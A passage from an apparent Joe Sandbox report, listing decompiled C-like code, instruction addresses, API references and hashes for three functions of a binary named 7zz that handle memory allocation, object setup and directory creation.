                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: 59@
                                                                                  • API String ID: 3519838083-2780377667
                                                                                  • Opcode ID: cb7b4bd2c4af9b8fe15fa2cdcbd2e201475b04ce8f4a32cc0f81032e162c00ed
                                                                                  • Instruction ID: 8a2df7c348f84777b7ad1a159669c3b3579df71dbce98e58b468e3cdb01b9464
                                                                                  • Opcode Fuzzy Hash: cb7b4bd2c4af9b8fe15fa2cdcbd2e201475b04ce8f4a32cc0f81032e162c00ed
                                                                                  • Instruction Fuzzy Hash: 2B11C4719002049ACB24EF59C4519EEBBB4EF55368F10823EE866A73C2C7389B05CB9C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00406D26 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 54%
                                                                                  			E00406D26(signed int* __ecx) {
				signed int _t17;
				signed int* _t18;
				signed int* _t22;
				signed int _t31;
				signed int* _t34;
				void* _t36;

				L0046B890(0x473641, _t36);
				_push(__ecx);
				_t34 = __ecx;
				 *__ecx =  *(_t36 + 8);
				_t22 = 0;
				_t17 = 4;
				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
				__ecx[3] = 0;
				__ecx[4] = 0;
				__ecx[5] = 0;
				__ecx[6] = _t17;
				__ecx[2] = 0x47a420;
				_t31 =  *__ecx;
				 *((intOrPtr*)(_t36 - 4)) = 0;
				_push(_t31 * 0x1c + _t17); // executed
				_t18 = L004079F2(); // executed
				 *(_t36 + 8) = _t18;
				 *((char*)(_t36 - 4)) = 1;
				if(_t18 != 0) {
					_push(L00406E0B);
					_t11 =  &(_t18[1]); // 0x4
					_t22 = _t11;
					 *_t18 = _t31;
					L0046BDE5(_t22, 0x1c, _t31, 0x406da2);
				}
				 *(_t34 + 4) = _t22;
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}









                                                                                  0x00406d2b
                                                                                  0x00406d30
                                                                                  0x00406d36
                                                                                  0x00406d3b
                                                                                  0x00406d3d
                                                                                  0x00406d3f
                                                                                  0x00406d40
                                                                                  0x00406d43
                                                                                  0x00406d46
                                                                                  0x00406d49
                                                                                  0x00406d4c
                                                                                  0x00406d4f
                                                                                  0x00406d56
                                                                                  0x00406d58
                                                                                  0x00406d62
                                                                                  0x00406d63
                                                                                  0x00406d69
                                                                                  0x00406d6e
                                                                                  0x00406d72
                                                                                  0x00406d74
                                                                                  0x00406d7e
                                                                                  0x00406d7e
                                                                                  0x00406d85
                                                                                  0x00406d87
                                                                                  0x00406d87
                                                                                  0x00406d8f
                                                                                  0x00406d97
                                                                                  0x00406d9f

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: 59@
                                                                                  • API String ID: 3519838083-2780377667
                                                                                  • Opcode ID: ccaf45141dc2e5dfeafb79c2efc15b9fdd1926c8c86a780438c4f9b1b500aaa8
                                                                                  • Instruction ID: 8e0203aed7f2cdd9f9826150055b001f54c225d166ae57bfc4d77955059de4c0
                                                                                  • Opcode Fuzzy Hash: ccaf45141dc2e5dfeafb79c2efc15b9fdd1926c8c86a780438c4f9b1b500aaa8
                                                                                  • Instruction Fuzzy Hash: E30152B1A00304AFD724DF5ED885A9AFBF4FB48704B50893FE14AD7781D3749A448B94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00418A23 Relevance: 3.2, APIs: 2, Instructions: 206COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 80%
                                                                                  			E00418A23(intOrPtr __ecx) {
				intOrPtr _t105;
				intOrPtr _t113;
				void* _t115;
				intOrPtr _t118;
				long _t123;
				intOrPtr* _t131;
				void* _t137;
				void* _t141;
				intOrPtr* _t151;
				signed int _t157;
				intOrPtr _t192;
				intOrPtr* _t196;
				long _t198;
				void* _t199;

				L0046B890(E00474EAE, _t199);
				_t192 = __ecx;
				_t157 = 0;
				_push(0x90);
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(_t199 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_t105 = L004079F2();
				 *((intOrPtr*)(_t199 - 0x18)) = _t105;
				 *(_t199 - 4) = 0;
				if(_t105 == 0) {
					_t196 = 0;
					__eflags = 0;
				} else {
					_t196 = E00418C9D(_t105);
				}
				 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t199 - 0x10)) = _t196;
				if(_t196 != _t157) {
					 *((intOrPtr*)( *_t196 + 4))(_t196);
				}
				 *((intOrPtr*)(_t196 + 0x7c)) =  *((intOrPtr*)(_t199 + 0x1c));
				 *(_t199 - 4) = 1;
				 *(_t199 - 0x3c) = _t157;
				 *(_t199 - 0x38) = _t157;
				 *(_t199 - 0x34) = _t157;
				E00401E9A(_t199 - 0x3c, 3);
				 *(_t199 - 4) = 2;
				 *(_t199 - 0x24) = _t157;
				 *(_t199 - 0x20) = _t157;
				 *(_t199 - 0x1c) = _t157;
				E00401E9A(_t199 - 0x24, 3);
				 *(_t199 - 4) = 3;
				 *(_t199 - 0x30) = _t157;
				 *(_t199 - 0x2c) = _t157;
				 *(_t199 - 0x28) = _t157;
				E00401E9A(_t199 - 0x30, 3);
				 *(_t199 - 4) = 4;
				if( *((intOrPtr*)(_t199 + 0x14)) != _t157 ||  *((intOrPtr*)(_t199 + 0x10)) != _t157) {
					_t58 = _t196 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t196 + 8)) + 0xc))(_t58,  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))));
					goto L13;
				} else {
					if(E0040A28C( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x18)))), _t199 - 0x3c, _t199 + 0x1c) != 0) {
						_t137 = L00407399(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 5;
						E00401E26(_t199 - 0x24, _t137);
						 *(_t199 - 4) = 4;
						L00407A18( *((intOrPtr*)(_t199 - 0x48)));
						_t141 = L004072C9(_t199 - 0x3c, _t199 - 0x48,  *((intOrPtr*)(_t199 + 0x1c)));
						 *(_t199 - 4) = 6;
						E00401E26(_t199 - 0x30, _t141);
						 *(_t199 - 4) = 4;
						L00407A18( *((intOrPtr*)(_t199 - 0x48)));
						_push(_t199 - 0x30);
						_push(_t199 - 0x24);
						E00418E2D(_t196, __eflags); // executed
						L13:
						_push( *((intOrPtr*)(_t199 - 0x10)));
						_push( *((intOrPtr*)(_t199 + 0x18)));
						_push( *((intOrPtr*)(_t199 + 0x14)));
						_push( *((intOrPtr*)(_t199 + 0x10)));
						_push( *((intOrPtr*)(_t199 + 0xc)));
						_push( *((intOrPtr*)(_t199 + 8)));
						_t113 = E00418554(_t192); // executed
						__eflags = _t113 - _t157;
						 *((intOrPtr*)(_t199 + 0x18)) = _t113;
						if(_t113 == _t157) {
							_push(_t199 - 0x30);
							_t115 = L0040B0A0(_t199 - 0x48, _t199 - 0x24);
							_t193 = _t192 + 0x14;
							_push(_t115);
							 *(_t199 - 4) = 7;
							L00406796(_t192 + 0x14);
							 *(_t199 - 4) = 4;
							L00407A18( *((intOrPtr*)(_t199 - 0x48)));
							__eflags =  *((intOrPtr*)(_t196 + 0x70)) - _t157;
							if( *((intOrPtr*)(_t196 + 0x70)) > _t157) {
								do {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x74)) + _t157 * 4)));
									_push(L0040B0A0(_t199 - 0x48, _t199 - 0x24));
									 *(_t199 - 4) = 8;
									L00406796(_t193);
									 *(_t199 - 4) = 4;
									L00407A18( *((intOrPtr*)(_t199 - 0x48)));
									_t157 = _t157 + 1;
									__eflags = _t157 -  *((intOrPtr*)(_t196 + 0x70));
								} while (_t157 <  *((intOrPtr*)(_t196 + 0x70)));
							}
							_t118 =  *((intOrPtr*)(_t199 - 0x14));
							 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t196 + 0x88));
							 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t196 + 0x8c));
							L00407A18( *(_t199 - 0x30));
							L00407A18( *(_t199 - 0x24));
							L00407A18( *(_t199 - 0x3c));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							L0043361B(_t199 - 0x10);
							_t123 = 0;
							__eflags = 0;
						} else {
							L00407A18( *(_t199 - 0x30));
							L00407A18( *(_t199 - 0x24));
							L00407A18( *(_t199 - 0x3c));
							_t131 =  *((intOrPtr*)(_t199 - 0x10));
							 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
							__eflags = _t131 - _t157;
							if(_t131 != _t157) {
								 *((intOrPtr*)( *_t131 + 8))(_t131);
							}
							_t123 =  *((intOrPtr*)(_t199 + 0x18));
						}
					} else {
						_t198 = GetLastError();
						L00407A18( *(_t199 - 0x30));
						L00407A18( *(_t199 - 0x24));
						L00407A18( *(_t199 - 0x3c));
						_t151 =  *((intOrPtr*)(_t199 - 0x10));
						 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
						if(_t151 != _t157) {
							 *((intOrPtr*)( *_t151 + 8))(_t151);
						}
						_t123 = _t198;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t199 - 0xc));
				return _t123;
			}

















                                                                                  0x00418a28
                                                                                  0x00418a33
                                                                                  0x00418a35
                                                                                  0x00418a37
                                                                                  0x00418a3c
                                                                                  0x00418a3f
                                                                                  0x00418a42
                                                                                  0x00418a45
                                                                                  0x00418a4b
                                                                                  0x00418a50
                                                                                  0x00418a53
                                                                                  0x00418a60
                                                                                  0x00418a60
                                                                                  0x00418a55
                                                                                  0x00418a5c
                                                                                  0x00418a5c
                                                                                  0x00418a62
                                                                                  0x00418a68
                                                                                  0x00418a6b
                                                                                  0x00418a70
                                                                                  0x00418a70
                                                                                  0x00418a78
                                                                                  0x00418a7e
                                                                                  0x00418a85
                                                                                  0x00418a88
                                                                                  0x00418a8b
                                                                                  0x00418a8e
                                                                                  0x00418a98
                                                                                  0x00418a9c
                                                                                  0x00418a9f
                                                                                  0x00418aa2
                                                                                  0x00418aa5
                                                                                  0x00418aaf
                                                                                  0x00418ab3
                                                                                  0x00418ab6
                                                                                  0x00418ab9
                                                                                  0x00418abc
                                                                                  0x00418ac4
                                                                                  0x00418ac8
                                                                                  0x00418b92
                                                                                  0x00418b97
                                                                                  0x00000000
                                                                                  0x00418ad7
                                                                                  0x00418aea
                                                                                  0x00418b31
                                                                                  0x00418b3a
                                                                                  0x00418b3e
                                                                                  0x00418b46
                                                                                  0x00418b4a
                                                                                  0x00418b5a
                                                                                  0x00418b63
                                                                                  0x00418b67
                                                                                  0x00418b6f
                                                                                  0x00418b73
                                                                                  0x00418b7c
                                                                                  0x00418b80
                                                                                  0x00418b83
                                                                                  0x00418b9a
                                                                                  0x00418b9a
                                                                                  0x00418b9f
                                                                                  0x00418ba2
                                                                                  0x00418ba5
                                                                                  0x00418ba8
                                                                                  0x00418bab
                                                                                  0x00418bae
                                                                                  0x00418bb3
                                                                                  0x00418bb5
                                                                                  0x00418bb8
                                                                                  0x00418bf4
                                                                                  0x00418bf8
                                                                                  0x00418bfd
                                                                                  0x00418c00
                                                                                  0x00418c03
                                                                                  0x00418c07
                                                                                  0x00418c0f
                                                                                  0x00418c13
                                                                                  0x00418c18
                                                                                  0x00418c1c
                                                                                  0x00418c1e
                                                                                  0x00418c27
                                                                                  0x00418c2f
                                                                                  0x00418c32
                                                                                  0x00418c36
                                                                                  0x00418c3e
                                                                                  0x00418c42
                                                                                  0x00418c47
                                                                                  0x00418c49
                                                                                  0x00418c49
                                                                                  0x00418c1e
                                                                                  0x00418c4e
                                                                                  0x00418c5a
                                                                                  0x00418c63
                                                                                  0x00418c66
                                                                                  0x00418c6e
                                                                                  0x00418c76
                                                                                  0x00418c7b
                                                                                  0x00418c85
                                                                                  0x00418c8a
                                                                                  0x00418c8a
                                                                                  0x00418bba
                                                                                  0x00418bbd
                                                                                  0x00418bc5
                                                                                  0x00418bcd
                                                                                  0x00418bd2
                                                                                  0x00418bd5
                                                                                  0x00418bdc
                                                                                  0x00418bde
                                                                                  0x00418be3
                                                                                  0x00418be3
                                                                                  0x00418be6
                                                                                  0x00418be6
                                                                                  0x00418aec
                                                                                  0x00418af5
                                                                                  0x00418af7
                                                                                  0x00418aff
                                                                                  0x00418b07
                                                                                  0x00418b0c
                                                                                  0x00418b0f
                                                                                  0x00418b18
                                                                                  0x00418b1d
                                                                                  0x00418b1d
                                                                                  0x00418b20
                                                                                  0x00418b20
                                                                                  0x00418aea
                                                                                  0x00418c92
                                                                                  0x00418c9a

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00418A28
                                                                                  • GetLastError.KERNEL32(?,00000003,00000003,00000003,?,00000000,00000000), ref: 00418AEC
                                                                                    • Part of subcall function 00418C9D: __EH_prolog.LIBCMT ref: 00418CA2
                                                                                    • Part of subcall function 00418E2D: __EH_prolog.LIBCMT ref: 00418E32
                                                                                    • Part of subcall function 00418554: __EH_prolog.LIBCMT ref: 00418559
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 2901101390-0
                                                                                  • Opcode ID: c9f4e70e773d5ff2db6c1d574806bff589abc09b194824381731b90e3be6153d
                                                                                  • Instruction ID: 21ff3a450d6b3ea728cd5a75b88ce90788197c2b0c5ee23b9bcb2e1d4e856eb5
                                                                                  • Opcode Fuzzy Hash: c9f4e70e773d5ff2db6c1d574806bff589abc09b194824381731b90e3be6153d
                                                                                  • Instruction Fuzzy Hash: 9F814771D04209EBCF01EFA5D881ADEBBB5BF08314F14456EF415B32A1DB39AA44CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00409D7C Relevance: 3.2, APIs: 2, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 99%
                                                                                  			E00409D7C(void* __ecx) {
				signed int _t64;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed char _t75;
				long _t78;
				signed int _t80;
				signed char _t82;
				signed int _t87;
				intOrPtr* _t88;
				void* _t92;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t109;
				signed int _t116;
				intOrPtr _t123;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				void* _t132;
				signed int _t135;
				void* _t138;

				L0046B890(0x473ab8, _t138);
				L00403532(_t138 - 0x18, __ecx);
				_t109 =  *(_t138 - 0x14);
				 *(_t138 - 4) =  *(_t138 - 4) & 0x00000000;
				_t132 = 0x5c;
				if(_t109 == 0) {
					L13:
					L004039C0(_t138 - 0x24, _t138 - 0x18);
					_t135 =  *(_t138 - 0x14);
					 *(_t138 - 4) = 1;
					while(1) {
						L14:
						_t64 = E00409CCB( *((intOrPtr*)(_t138 - 0x18))); // executed
						__eflags = _t64;
						if(_t64 != 0) {
							break;
						}
						_t78 = GetLastError();
						__eflags = _t78 - 0xb7;
						if(_t78 == 0xb7) {
							L0040351A(_t138 - 0x40);
							 *(_t138 - 4) = 2;
							_t80 = E0040B431(_t138 - 0x68, _t128, __eflags,  *((intOrPtr*)(_t138 - 0x18))); // executed
							__eflags = _t80;
							if(_t80 != 0) {
								_t82 =  *(_t138 - 0x48) >> 4;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									 *(_t138 - 4) = 1;
									L00407A18( *((intOrPtr*)(_t138 - 0x40)));
									break;
								} else {
									_t102 = 0;
									__eflags = 0;
									goto L31;
								}
							} else {
								_t102 = 1;
								L31:
								L00407A18( *((intOrPtr*)(_t138 - 0x40)));
								L00407A18( *((intOrPtr*)(_t138 - 0x24)));
								L00407A18( *((intOrPtr*)(_t138 - 0x18)));
							}
						} else {
							_t87 =  *(_t138 - 0x14);
							__eflags = _t87;
							if(_t87 == 0) {
								L44:
								_t102 = 0;
								__eflags = 0;
								L45:
								L00407A18( *((intOrPtr*)(_t138 - 0x24)));
								_t129 =  *((intOrPtr*)(_t138 - 0x18));
								goto L46;
							} else {
								_t123 =  *((intOrPtr*)(_t138 - 0x18));
								_t88 = _t123 + _t87 * 2 - 2;
								while(1) {
									__eflags =  *_t88 - _t132;
									if( *_t88 == _t132) {
										break;
									}
									__eflags = _t88 - _t123;
									if(_t88 == _t123) {
										_t135 = _t135 | 0xffffffff;
										__eflags = _t135;
									} else {
										_t88 = _t88;
										continue;
									}
									L23:
									__eflags = _t135;
									if(__eflags < 0 || __eflags == 0) {
										goto L44;
									} else {
										__eflags =  *((short*)(_t123 + _t135 * 2 - 2)) - 0x3a;
										if( *((short*)(_t123 + _t135 * 2 - 2)) == 0x3a) {
											goto L44;
										} else {
											_t92 = L00407399(_t138 - 0x18, _t138 - 0x30, _t135);
											 *(_t138 - 4) = 3;
											E00401E26(_t138 - 0x18, _t92);
											 *(_t138 - 4) = 1;
											L00407A18( *((intOrPtr*)(_t138 - 0x30)));
											goto L14;
										}
									}
									goto L47;
								}
								_t135 = _t88 - _t123 >> 1;
								goto L23;
							}
						}
						goto L47;
					}
					E00401E26(_t138 - 0x18, _t138 - 0x24);
					while(1) {
						L34:
						__eflags = _t135 -  *(_t138 - 0x14);
						if(_t135 >=  *(_t138 - 0x14)) {
							break;
						}
						_t130 =  *((intOrPtr*)(_t138 - 0x18));
						_t70 = _t130 + 2 + _t135 * 2;
						while(1) {
							_t116 =  *_t70;
							__eflags = _t116 - _t132;
							if(_t116 == _t132) {
								break;
							}
							__eflags = _t116;
							if(_t116 == 0) {
								_t135 = _t135 | 0xffffffff;
								__eflags = _t135;
							} else {
								_t70 = _t70 + 2;
								continue;
							}
							L41:
							__eflags = _t135;
							if(_t135 < 0) {
								_t135 =  *(_t138 - 0x14);
							}
							_t74 = L00407399(_t138 - 0x18, _t138 - 0x30, _t135);
							 *(_t138 - 4) = 4;
							_t75 = E00409CCB( *_t74);
							 *(_t138 - 4) = 1;
							asm("sbb bl, bl");
							L00407A18( *((intOrPtr*)(_t138 - 0x30)));
							__eflags =  ~_t75 + 1;
							if( ~_t75 + 1 == 0) {
								goto L34;
							} else {
								goto L44;
							}
							goto L45;
						}
						_t135 = _t70 - _t130 >> 1;
						goto L41;
					}
					_t102 = 1;
					goto L45;
				} else {
					_t128 =  *((intOrPtr*)(_t138 - 0x18));
					_t96 = _t128 + _t109 * 2 - 2;
					while( *_t96 != _t132) {
						if(_t96 == _t128) {
							_t98 = _t96 | 0xffffffff;
							__eflags = _t98;
						} else {
							_t96 = _t96;
							continue;
						}
						L7:
						__eflags = _t98;
						if(_t98 <= 0) {
							goto L13;
						} else {
							__eflags = _t98 - _t109 - 1;
							if(_t98 != _t109 - 1) {
								goto L13;
							} else {
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									L12:
									L004075A5(_t138 - 0x18, _t98, 1);
									goto L13;
								} else {
									__eflags =  *((short*)(_t128 + 2)) - 0x3a;
									if( *((short*)(_t128 + 2)) != 0x3a) {
										goto L12;
									} else {
										_t102 = 1;
										L46:
										L00407A18(_t129);
									}
								}
							}
						}
						goto L47;
					}
					_t98 = _t96 - _t128 >> 1;
					goto L7;
				}
				L47:
				 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
				return _t102;
			}

























                                                                                  0x00409d81
                                                                                  0x00409d90
                                                                                  0x00409d95
                                                                                  0x00409d98
                                                                                  0x00409da0
                                                                                  0x00409da1
                                                                                  0x00409de9
                                                                                  0x00409df0
                                                                                  0x00409df5
                                                                                  0x00409df8
                                                                                  0x00409dfc
                                                                                  0x00409dfc
                                                                                  0x00409dff
                                                                                  0x00409e04
                                                                                  0x00409e06
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409e0c
                                                                                  0x00409e12
                                                                                  0x00409e17
                                                                                  0x00409e8c
                                                                                  0x00409e97
                                                                                  0x00409e9b
                                                                                  0x00409ea0
                                                                                  0x00409ea2
                                                                                  0x00409eab
                                                                                  0x00409eae
                                                                                  0x00409eb0
                                                                                  0x00409ed7
                                                                                  0x00409edb
                                                                                  0x00000000
                                                                                  0x00409eb2
                                                                                  0x00409eb2
                                                                                  0x00409eb2
                                                                                  0x00000000
                                                                                  0x00409eb2
                                                                                  0x00409ea4
                                                                                  0x00409ea4
                                                                                  0x00409eb4
                                                                                  0x00409eb7
                                                                                  0x00409ebf
                                                                                  0x00409ec7
                                                                                  0x00409ecc
                                                                                  0x00409e19
                                                                                  0x00409e19
                                                                                  0x00409e1c
                                                                                  0x00409e1e
                                                                                  0x00409f51
                                                                                  0x00409f51
                                                                                  0x00409f51
                                                                                  0x00409f53
                                                                                  0x00409f56
                                                                                  0x00409f5b
                                                                                  0x00000000
                                                                                  0x00409e24
                                                                                  0x00409e24
                                                                                  0x00409e27
                                                                                  0x00409e2b
                                                                                  0x00409e2b
                                                                                  0x00409e2e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409e30
                                                                                  0x00409e32
                                                                                  0x00409e40
                                                                                  0x00409e40
                                                                                  0x00409e34
                                                                                  0x00409e35
                                                                                  0x00000000
                                                                                  0x00409e35
                                                                                  0x00409e43
                                                                                  0x00409e43
                                                                                  0x00409e45
                                                                                  0x00000000
                                                                                  0x00409e51
                                                                                  0x00409e51
                                                                                  0x00409e57
                                                                                  0x00000000
                                                                                  0x00409e5d
                                                                                  0x00409e65
                                                                                  0x00409e6e
                                                                                  0x00409e72
                                                                                  0x00409e77
                                                                                  0x00409e7e
                                                                                  0x00000000
                                                                                  0x00409e83
                                                                                  0x00409e57
                                                                                  0x00000000
                                                                                  0x00409e45
                                                                                  0x00409e3c
                                                                                  0x00000000
                                                                                  0x00409e3c
                                                                                  0x00409e1e
                                                                                  0x00000000
                                                                                  0x00409e17
                                                                                  0x00409ee8
                                                                                  0x00409eed
                                                                                  0x00409eed
                                                                                  0x00409eed
                                                                                  0x00409ef0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ef6
                                                                                  0x00409ef9
                                                                                  0x00409efd
                                                                                  0x00409efd
                                                                                  0x00409f00
                                                                                  0x00409f03
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409f05
                                                                                  0x00409f08
                                                                                  0x00409f16
                                                                                  0x00409f16
                                                                                  0x00409f0a
                                                                                  0x00409f0b
                                                                                  0x00000000
                                                                                  0x00409f0b
                                                                                  0x00409f19
                                                                                  0x00409f19
                                                                                  0x00409f1b
                                                                                  0x00409f1d
                                                                                  0x00409f1d
                                                                                  0x00409f28
                                                                                  0x00409f2f
                                                                                  0x00409f33
                                                                                  0x00409f3a
                                                                                  0x00409f43
                                                                                  0x00409f47
                                                                                  0x00409f4c
                                                                                  0x00409f4f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409f4f
                                                                                  0x00409f12
                                                                                  0x00000000
                                                                                  0x00409f12
                                                                                  0x00409f77
                                                                                  0x00000000
                                                                                  0x00409da3
                                                                                  0x00409da3
                                                                                  0x00409da6
                                                                                  0x00409daa
                                                                                  0x00409db1
                                                                                  0x00409dbd
                                                                                  0x00409dbd
                                                                                  0x00409db3
                                                                                  0x00409db4
                                                                                  0x00000000
                                                                                  0x00409db4
                                                                                  0x00409dc0
                                                                                  0x00409dc0
                                                                                  0x00409dc2
                                                                                  0x00000000
                                                                                  0x00409dc4
                                                                                  0x00409dc7
                                                                                  0x00409dc9
                                                                                  0x00000000
                                                                                  0x00409dcb
                                                                                  0x00409dcb
                                                                                  0x00409dce
                                                                                  0x00409dde
                                                                                  0x00409de4
                                                                                  0x00000000
                                                                                  0x00409dd0
                                                                                  0x00409dd0
                                                                                  0x00409dd5
                                                                                  0x00000000
                                                                                  0x00409dd7
                                                                                  0x00409dd7
                                                                                  0x00409f5f
                                                                                  0x00409f60
                                                                                  0x00409f65
                                                                                  0x00409dd5
                                                                                  0x00409dce
                                                                                  0x00409dc9
                                                                                  0x00000000
                                                                                  0x00409dc2
                                                                                  0x00409db9
                                                                                  0x00000000
                                                                                  0x00409db9
                                                                                  0x00409f66
                                                                                  0x00409f6e
                                                                                  0x00409f76

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00409D81
                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00409E0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorH_prologLast
                                                                                  • String ID:
                                                                                  • API String ID: 1057991267-0
                                                                                  • Opcode ID: 27410a41fbf9886fd801f2971488f14059beac07e3496cbe200165a808850a0c
                                                                                  • Instruction ID: a50931f9f0b53e642fd9c4839daf4fd4c57a1ea79cde473ef903889cc23e4543
                                                                                  • Opcode Fuzzy Hash: 27410a41fbf9886fd801f2971488f14059beac07e3496cbe200165a808850a0c
                                                                                  • Instruction Fuzzy Hash: DE51DF31D4410ADADF10EBA1C942AEEBB74AF51318F14017BE801B72D2D739AE46C7D9
                                                                                  Uniqueness

